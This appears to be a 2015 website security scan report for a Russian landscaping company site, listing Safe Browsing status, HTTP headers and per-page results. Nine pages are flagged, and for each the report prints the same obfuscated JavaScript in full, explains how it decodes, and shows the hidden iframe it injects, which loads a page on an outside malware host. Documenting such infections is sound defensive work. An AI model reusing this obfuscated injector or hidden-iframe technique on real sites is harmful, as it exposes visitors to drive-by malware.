Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usadba-rus.ru
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://usadba-rus.ru/ | 200 OK Content-Length: 12920 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069();
How it works: the table in the first variable maps the punctuation characters of the long string back to hex digits, the result is percent-decoded and written into the page with document.write, producing the hidden iframe shown below.
Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div>
Antivirus reports:
| ||
http://usadba-rus.ru/media/system/js/core.js | 200 OK Content-Length: 4225 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/templates/versia2/jquery.js | 200 OK Content-Length: 91671 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/templates/versia2/script.js | 200 OK Content-Length: 7153 Content-Type: application/x-javascript | clean |
http://usadba-rus.ru/index.php/o-kompanii | 200 OK Content-Length: 17502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/prajs | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/novosti | 200 OK Content-Length: 12910 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/landshaftnyj-dizajn | 200 OK Content-Length: 11464 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/vodojomy | 200 OK Content-Length: 11411 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/vodojomy/oborudovanie | 200 OK Content-Length: 11467 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/nashi-proekty | 200 OK Content-Length: 15841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/index.php/kontakty | 200 OK Content-Length: 11924 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://usadba-rus.ru/test404page.js | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usadba-rus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 27 Jan 2015 16:09:32 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 21e75628f1cd7e79ea56ea6c97167af0=451b5bc02f444b67c9282d3b8f85f6ec; path=/
X-Powered-By: PHP/5.5.20
GET / HTTP/1.1
Host: usadba-rus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 27 Jan 2015 16:09:32 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 21e75628f1cd7e79ea56ea6c97167af0=451b5bc02f444b67c9282d3b8f85f6ec; path=/
X-Powered-By: PHP/5.5.20
Second query (visit from search engine):
GET / HTTP/1.1
Host: usadba-rus.ru
Referer: http://www.google.com/search?q=usadba-rus.ru
Result:
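The result is similar to the first query; no suspicious redirects were found. This check covers redirects only: the hidden iframe injection reported under "Scanned pages/files" is a separate finding.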
GET / HTTP/1.1
Host: usadba-rus.ru
Referer: http://www.google.com/search?q=usadba-rus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.